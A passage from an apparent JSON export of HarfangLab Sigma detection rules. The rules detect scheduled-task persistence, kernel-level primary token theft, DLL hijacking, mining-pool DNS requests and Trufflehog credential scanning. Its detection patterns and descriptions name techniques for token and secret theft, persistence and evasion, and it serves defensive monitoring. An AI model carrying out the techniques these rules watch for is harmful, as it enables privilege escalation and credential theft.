Bypass -File \"%ProgramData%\\AMD\\Manageability\\AMSUninstallCleanup.ps1\"'\n\n exclusion_lenovo:\n TaskName: '\\Lenovo\\DockManager\\DockManager - Service Launcher'\n FirstActionCommandLine: 'NET STOP \"dockmgr.svc.exe\"'\n\n exclusion_rudder:\n TaskName: '\\Rudder-Agent'\n FirstActionCommandLine: 'powershell.exe -NonInteractive -NoLogo -WindowStyle Hidden -file \"?:\\Program Files\\Rudder?bin?rudder.ps1\" agent update'\n\n exclusion_egalax:\n TaskName: '\\eGalaxRegisterTaskService'\n FirstActionCommandLine|contains: '?:\\Program Files\\Common Files\\EETI\\TouchControl.exe\" -UpdateTouchMode'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a4efa888-5666-4c7a-be53-94ec7fa3b9c9",
"rule_name": "Scheduled Task With Unusual Number of Actions",
"rule_description": "Detects the creation or update of a scheduled task containing two actions or more.\nThreat actors may update an initially legitimate scheduled task by appending a second action (scheduled task's way of executing code) that launches their malicious payload for persistence as a way to avoid defenses.\nIt is recommended to click the \"Task Information\" button and investigate the contents of the scheduled task thoroughly to determine maliciousness.\n",
"rule_creation_date": "2025-09-02",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a5115c2e-c9c3-43cf-aa11-a7001d4f852f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.596184Z",
"creation_date": "2026-03-23T11:45:34.596187Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596195Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://jonny-johnson.medium.com/changing-primary-tokens-session-id-931c269aa08e",
"https://www.solomonsklash.io/stealing-tokens-with-malicious-driver.html",
"https://attack.mitre.org/techniques/T1134/001/",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1134_001_primary_token_theft_kernel.yml",
"content": "title: Primary Token Theft Detected\nid: a5115c2e-c9c3-43cf-aa11-a7001d4f852f\ndescription: |\n Detects a process primary token being stolen and added to another process either directly from kernel memory or through NtSetInformationProcess.\n Attackers can use vulnerable kernel drivers to have read/write primitives on the kernel memory.\n Using these primitives, attackers can modify undocumented kernel structures pertaining to processes, and more specifically copy access tokens to other processes to elevate their privileges.\n Attackers can also use NtSetInformationProcess to add a process's primary token to another process while it is suspended.é\n It is recommended to search for unusual driver loads preceding this alert, as well as to analyze the targeted process for malicious content or behavior.\nreferences:\n - https://jonny-johnson.medium.com/changing-primary-tokens-session-id-931c269aa08e\n - https://www.solomonsklash.io/stealing-tokens-with-malicious-driver.html\n - https://attack.mitre.org/techniques/T1134/001/\n - https://attack.mitre.org/techniques/T1068/\ndate: 2024/02/01\nmodified: 2025/09/24\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1134.001\n - attack.t1068\n - classification.Windows.Source.PrimaryTokenChange\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Exploitation\nlogsource:\n product: windows\n category: primary_token_change\ndetection:\n selection_low_to_privileged:\n ProcessIntegrityLevel:\n - 'Untrusted'\n - 'Low'\n - 'Medium'\n - 'Unknown'\n NewIntegrityLevel:\n - 'High'\n - 'System'\n\n selection_high_to_system:\n ProcessIntegrityLevel: 'High'\n NewIntegrityLevel: 'System'\n\n filter_msiexec:\n NewIntegrityLevel: 'System'\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n\n filter_broken_tokens:\n - ProcessParentIntegrityLevel: 'Unknown'\n - ProcessGrandparentIntegrityLevel: 'Unknown'\n\n exclusion_posix_subsystem:\n - ProcessGrandparentImage: '?:\\Windows\\System32\\psxss.exe'\n - ProcessParentImage: '?:\\Windows\\System32\\psxss.exe'\n - ProcessImage: '?:\\Windows\\System32\\psxss.exe'\n\n exclusion_uni_elevator:\n ProcessParentImage:\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\UniGetUI\\Assets\\Utilities\\UniGetUI Elevator.exe'\n - '?:\\Program Files\\WingetUI\\Assets\\Utilities\\UniGetUI Elevator.exe'\n - '?:\\Program Files\\UniGetUI\\Assets\\Utilities\\UniGetUI Elevator.exe'\n\n exclusion_total_security:\n ProcessImage|startswith:\n - '?:\\Program Files (x86)\\360\\Total Security\\'\n - '?:\\Program Files\\360\\Total Security\\'\n - '?:\\Program Files (x86)\\360\\360safe\\'\n - '?:\\Program Files\\360\\360safe\\'\n\n exclusion_gsudo:\n ProcessParentOriginalFileName:\n - 'gsudo.dll'\n - 'gsudo.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature:\n - 'Gerardo Grignoli'\n - 'Inext Ventures Inc'\n\n exclusion_avast:\n ProcessAncestors|contains:\n - '?:\\Program Files\\Avast Software\\Avast\\AvastSvc.exe'\n - '?:\\Program Files (x86)\\Avast Software\\Avast\\AvastSvc.exe'\n\n exclusion_wsl:\n - ProcessImage: '?:\\Windows\\System32\\wsl.exe'\n - ProcessAncestors|contains: '?:\\Windows\\System32\\wsl.exe'\n\n exclusion_ivanti_workspace_control:\n ProcessAncestors|contains:\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pfwsmgr.exe'\n - '?:\\Program Files\\Ivanti\\Workspace Control\\pfwsmgr.exe'\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pwrgrid.exe'\n - '?:\\Program Files\\Ivanti\\Workspace Control\\pwrgrid.exe'\n - '?:\\Program Files (x86)\\Ivanti\\Ivanti Cloud Agent\\UWM_AC_ENGINE.WIN64\\AMAgent.exe'\n - '?:\\Program Files\\Ivanti\\Ivanti Cloud Agent\\UWM_AC_ENGINE.WIN64\\AMAgent.exe'\n - '?:\\Program Files (x86)\\RES Software\\Workspace Manager\\pfwsmgr.exe'\n - '?:\\Program Files\\RES Software\\Workspace Manager\\pfwsmgr.exe'\n - '?:\\Program Files (x86)\\RES Software\\Workspace Manager\\wmstartmenu.exe'\n - '?:\\Program Files\\RES Software\\Workspace Manager\\wmstartmenu.exe'\n condition: 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a5115c2e-c9c3-43cf-aa11-a7001d4f852f",
"rule_name": "Primary Token Theft Detected",
"rule_description": "Detects a process primary token being stolen and added to another process either directly from kernel memory or through NtSetInformationProcess.\nAttackers can use vulnerable kernel drivers to have read/write primitives on the kernel memory.\nUsing these primitives, attackers can modify undocumented kernel structures pertaining to processes, and more specifically copy access tokens to other processes to elevate their privileges.\nAttackers can also use NtSetInformationProcess to add a process's primary token to another process while it is suspended.é\nIt is recommended to search for unusual driver loads preceding this alert, as well as to analyze the targeted process for malicious content or behavior.\n",
"rule_creation_date": "2024-02-01",
"rule_modified_date": "2025-09-24",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068",
"attack.t1134.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a512ebf0-fe11-4238-a1ce-fefde18c321c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086835Z",
"creation_date": "2026-03-23T11:45:34.086837Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086842Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/netero1010/GhostTask",
"https://attack.mitre.org/techniques/T1112/",
"https://attack.mitre.org/techniques/T1053/005/"
],
"name": "t1112_scheduled_task_created_registry.yml",
"content": "title: Scheduled Task Created via Registry Modification\nid: a512ebf0-fe11-4238-a1ce-fefde18c321c\ndescription: |\n Detects the creation of a scheduled task via a manual registry modification.\n Scheduled tasks are often used by attackers as persistence mechanisms.\n To evade detection, they can create a scheduled task through a registry key manipulation, however, SYSTEM privileges are required.\n It is recommended to investigate the process performing this action to determine its legitimacy.\nreferences:\n - https://github.com/netero1010/GhostTask\n - https://attack.mitre.org/techniques/T1112/\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2023/11/22\nmodified: 2026/02/17\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\\\*\\Id'\n Details: '{????????-????-????-????-????????????}'\n ProcessImage|contains: '?'\n\n filter_scheduler:\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule' # windows 10 Version 1703 and above\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p' # windows versions before 1703\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs' # windows 7\n - '?:\\windows\\system32\\svchost.exe -k netsvcs -s Schedule' # Windows 10 1703\n\n exclusion_windeploy:\n ProcessCommandLine:\n - '?:\\$WINDOWS.~BT\\Sources\\SetupPlatform.exe /preoobe'\n - '?:\\Windows\\System32\\oobe\\Setup.exe'\n ProcessParentImage: '?:\\Windows\\System32\\oobe\\windeploy.exe'\n\n exclusion_tiworker:\n ProcessImage: '?:\\Windows\\WinSxS\\\\*\\TiWorker.exe'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_kodak:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\kodakalarisincscanner\\Id'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a512ebf0-fe11-4238-a1ce-fefde18c321c",
"rule_name": "Scheduled Task Created via Registry Modification",
"rule_description": "Detects the creation of a scheduled task via a manual registry modification.\nScheduled tasks are often used by attackers as persistence mechanisms.\nTo evade detection, they can create a scheduled task through a registry key manipulation, however, SYSTEM privileges are required.\nIt is recommended to investigate the process performing this action to determine its legitimacy.\n",
"rule_creation_date": "2023-11-22",
"rule_modified_date": "2026-02-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.005",
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a5514a00-d15f-42a9-9708-c4b080543efd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599998Z",
"creation_date": "2026-03-23T11:45:34.600002Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600010Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rendom.yml",
"content": "title: DLL Hijacking via rendo.exe\nid: a5514a00-d15f-42a9-9708-c4b080543efd\ndescription: |\n Detects potential Windows DLL Hijacking via rendo.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rendom.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dnsapi.dll'\n - '\\dsparse.dll'\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\ntdsapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a5514a00-d15f-42a9-9708-c4b080543efd",
"rule_name": "DLL Hijacking via rendo.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rendo.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a596512c-c042-4d93-aa3b-bcd10e987acb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294210Z",
"creation_date": "2026-03-23T11:45:35.294214Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294222Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.malwarebytes.com/cryptojacking",
"https://attack.mitre.org/techniques/T1496/"
],
"name": "t1496_cryptominer_pool_dns_request_windows.yml",
"content": "title: DNS Request to Cryptocurrency Mining Pool (Windows)\nid: a596512c-c042-4d93-aa3b-bcd10e987acb\ndescription: |\n Detects a DNS resolution request for a known cryptocurrency mining pool website.\n A mining pool is a joint group of cryptocurrency miners who combine resources over a network to find blocks quicker and share coins.\n This may be an indicator of hidden or covert mining programs in a system making requests to crypto pooling websites.\n It is recommended to investigate the process performing this request to determine its legitimacy.\nreferences:\n - https://www.malwarebytes.com/cryptojacking\n - https://attack.mitre.org/techniques/T1496/\ndate: 2023/04/06\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1496\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Behavior.CryptoMiner\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n QueryName|contains:\n - '2miners.com'\n - '6block.com'\n - 'acepool.top'\n - 'aionpool.tech'\n - 'alph-pool.com'\n - 'backend-aplha.com'\n - 'baikalmine.com'\n - 'blocx.zone'\n - 'bluenose.link'\n - 'bohemianpool.com'\n - 'c3pool.com'\n - 'cedric-crispin.com'\n - 'cryptonote.social'\n - 'crypto-pool.fr'\n - 'dxpool.net'\n - 'educu.xyz'\n - 'ekapool.com'\n - 'ethashpool.com'\n - 'ethermine.org'\n - 'ethwmine.com'\n - 'ezil.me'\n - 'f2pool.com'\n - 'fairhash.org'\n - 'fastpool.xyz'\n - 'flockpool.com'\n - 'fluxpools.net'\n - 'gntl.uk'\n - 'grinmint.com'\n - 'hashcity.org'\n - 'hashvault.pro'\n - 'herominers.com'\n - 'hiveon.com'\n - 'hiveon.net'\n - 'minerno.de'\n - 'minexmr.com'\n - 'miningmadness.com'\n - 'miningocean.org'\n - 'monerod.org'\n - 'monerohash.com'\n - 'moneroocean.stream'\n - 'monerop.com'\n - 'multi-pools.com'\n - 'nanopool.org'\n - 'nicehash.com'\n - 'p2pool.io'\n - 'pool2mine.net'\n - 'pool.binance.com'\n - 'poolin.com'\n - 'pool.kryptex.com'\n - 'pool.sero.cash'\n - 'pool.xmr.pt'\n - 'prohashing.com'\n - 'raptoreum.zone'\n - 'raptorhash.com'\n - 'ravenminer.com'\n - 'rplant.xyz'\n - 'semipool.com'\n - 'skypool.org'\n - 'solopool.org'\n - 'sunpool.top'\n - 'supportxmr.com'\n - 'suprnova.cc'\n - 'unmineable.com'\n - 'uupool.cn'\n - 'volt-mine.com'\n - 'woolypooly.com'\n - 'xmrpool.eu'\n - 'zergpool.com'\n - 'zeropool.io'\n - 'zpool.ca'\n\n exclusion_resolver:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k NetworkService -p -s Dnscache'\n\n exclusion_browser:\n ProcessOriginalFileName:\n - 'firefox.exe'\n - 'chrome.exe'\n - 'brave.exe'\n - 'msedge.exe'\n - 'librewolf.exe'\n - 'opera.exe'\n - 'vivaldi.exe'\n - 'iexplore.exe'\n - 'msedgewebview2.exe'\n - 'zen.exe'\n\n exclusion_svchost_sharedaccess:\n ProcessCommandLine: '?:\\Windows\\System32\\svchost.exe -k netsvcs -p -s SharedAccess'\n\n exclusion_mcafee:\n ProcessImage: '?:\\Program Files\\McAfee\\Endpoint Security\\Adaptive Threat Protection\\mfeatp.exe'\n\n exclusion_defender:\n ProcessOriginalFileName:\n - 'MsMpEng.exe'\n - 'MsSense.exe'\n - 'NisSrv.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_kaspersky:\n ProcessOriginalFileName: 'avp.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Kaspersky Lab JSC'\n\n exclusion_nexthink:\n # C:\\Program Files\\Nexthink\\Collector\\Collector\\nxtsvc.exe\n ProcessOriginalFileName: 'nxtsvc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'NEXThink S.A.'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\program files (x86)\\'\n ProcessSigned: 'true'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a596512c-c042-4d93-aa3b-bcd10e987acb",
"rule_name": "DNS Request to Cryptocurrency Mining Pool (Windows)",
"rule_description": "Detects a DNS resolution request for a known cryptocurrency mining pool website.\nA mining pool is a joint group of cryptocurrency miners who combine resources over a network to find blocks quicker and share coins.\nThis may be an indicator of hidden or covert mining programs in a system making requests to crypto pooling websites.\nIt is recommended to investigate the process performing this request to determine its legitimacy.\n",
"rule_creation_date": "2023-04-06",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1496"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a5980fd1-5944-47d7-a1df-560ad4ada0b3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070744Z",
"creation_date": "2026-03-23T11:45:34.070746Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070751Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/trufflesecurity/trufflehog",
"https://www.zscaler.com/fr/blogs/security-research/mitigating-risks-shai-hulud-npm-worm",
"https://about.gitlab.com/blog/gitlab-discovers-widespread-npm-supply-chain-attack/",
"https://attack.mitre.org/techniques/T1552/"
],
"name": "t1552_trufflehog_executed_macos.yml",
"content": "title: Trufflehog Executed (macOS)\nid: a5980fd1-5944-47d7-a1df-560ad4ada0b3\ndescription: |\n Detects the execution of Trufflehog, a security scanning tool commonly used to identify exposed secrets and credentials within source code repositories.\n This tool was used in the Shai Hulud campaign, where attackers leveraged it to search for exposed secrets within compromised repositories.\n The Shai Hulud campaign targeted the npm and Node.js ecosystem, focusing on compromised packages and developer environments to harvest exposed secrets and gain further access.\n It is recommended to analyze the execution chain associated with this alert to determine if the usage of this tool is legitimate.\nreferences:\n - https://github.com/trufflesecurity/trufflehog\n - https://www.zscaler.com/fr/blogs/security-research/mitigating-risks-shai-hulud-npm-worm\n - https://about.gitlab.com/blog/gitlab-discovers-widespread-npm-supply-chain-attack/\n - https://attack.mitre.org/techniques/T1552/\ndate: 2025/11/26\nmodified: 2025/11/27\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1083\n - attack.credential_access\n - attack.t1552\n - attack.collection\n - attack.t1213\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Tool.Trufflehog\n - classification.macOS.Behavior.Discovery\n - classification.macOS.Behavior.CredentialAccess\n - classification.macOS.Behavior.Collection\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|endswith: '/trufflehog'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a5980fd1-5944-47d7-a1df-560ad4ada0b3",
"rule_name": "Trufflehog Executed (macOS)",
"rule_description": "Detects the execution of Trufflehog, a security scanning tool commonly used to identify exposed secrets and credentials within source code repositories.\nThis tool was used in the Shai Hulud campaign, where attackers leveraged it to search for exposed secrets within compromised repositories.\nThe Shai Hulud campaign targeted the npm and Node.js ecosystem, focusing on compromised packages and developer environments to harvest exposed secrets and gain further access.\nIt is recommended to analyze the execution chain associated with this alert to determine if the usage of this tool is legitimate.\n",
"rule_creation_date": "2025-11-26",
"rule_modified_date": "2025-11-27",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1083",
"attack.t1213",
"attack.t1552"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a5a5daeb-19c0-4205-a23e-a08d3c70ee46",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094085Z",
"creation_date": "2026-03-23T11:45:34.094087Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094091Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_directxdatabaseupdater.yml",
"content": "title: DLL Hijacking via DirectXDatabaseUpdater.exe\nid: a5a5daeb-19c0-4205-a23e-a08d3c70ee46\ndescription: |\n Detects potential Windows DLL Hijacking via DirectXDatabaseUpdater.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'DirectXDatabaseUpdater.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dismapi.dll'\n - '\\npmproxy.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a5a5daeb-19c0-4205-a23e-a08d3c70ee46",
"rule_name": "DLL Hijacking via DirectXDatabaseUpdater.exe",
"rule_description": "Detects potential Windows DLL Hijacking via DirectXDatabaseUpdater.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
